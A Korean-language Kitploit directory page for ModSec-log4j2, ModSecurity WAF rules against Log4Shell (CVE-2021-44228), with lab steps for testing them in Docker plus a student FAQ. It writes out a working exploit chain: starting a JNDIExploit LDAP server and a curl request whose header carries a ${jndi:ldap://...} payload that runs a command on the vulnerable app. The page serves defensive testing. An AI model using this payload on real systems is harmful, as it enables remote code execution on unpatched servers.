Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ModSec-log4j2 — log4j2 보호를 위한 ModSec 규칙 - CVE-2021-44228 | Kitploit
도구/GitHubGitHub/felipe8398/modsec-log4j2
Vulnerability ScannersExploitationWeb Application ExploitationWAF BypassPenetration TestingLearning & Education
GitHubfelipe8398/modsec-log4j2

ModSec-log4j2

log4j2 보호를 위한 ModSec 규칙 - CVE-2021-44228

저장소 보기
44년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ModSec 규칙 테스트

사전 요구사항

  • Docker 설치 필요
  • Java 설치 필요 (로컬 머신)

테스트 실행

  • 저장소를 git clone 합니다
  • 아래 명령어를 실행하여 WAF(ModSec)와 취약한 애플리케이션을 시작합니다
root@kitploit:~
docker stack deploy -c docker-compose.yml WAF
  • 저장소에 있는 JNDIExploit.v1.2.zip의 압축을 풀고, 해당 폴더로 이동한 후 아래 명령어를 실행합니다. $IP는 본인 머신의 IP여야 하며, 127.0.0.1을 사용하지 않는 것을 권장합니다.
root@kitploit:~
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
  • RCE를 테스트하려면 아래 curl을 실행하되 $IP를 본인 머신의 IP로 변경하세요. 이 명령은 취약한 애플리케이션의 /tmp 안에 pwned 파일을 생성합니다.
root@kitploit:~
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

대학생들의 질문

1- 내 WAF와 취약한 웹 애플리케이션이 올바르게 실행되었는지 어떻게 알 수 있나요?

docker service ls 를 실행하여 각각 하나의 레플리카를 가진 두 개의 서비스가 있는지 확인하세요.

2- ModSec 로그는 어떻게 확인하나요?

docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log 를 실행하세요.

3- RCE가 실패했는지 어떻게 확인하나요?

우리가 사용한 curl은 /tmp 안에 pwned라는 파일을 생성하므로, 아래 명령어를 실행해야 합니다. docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp

도구 다운로드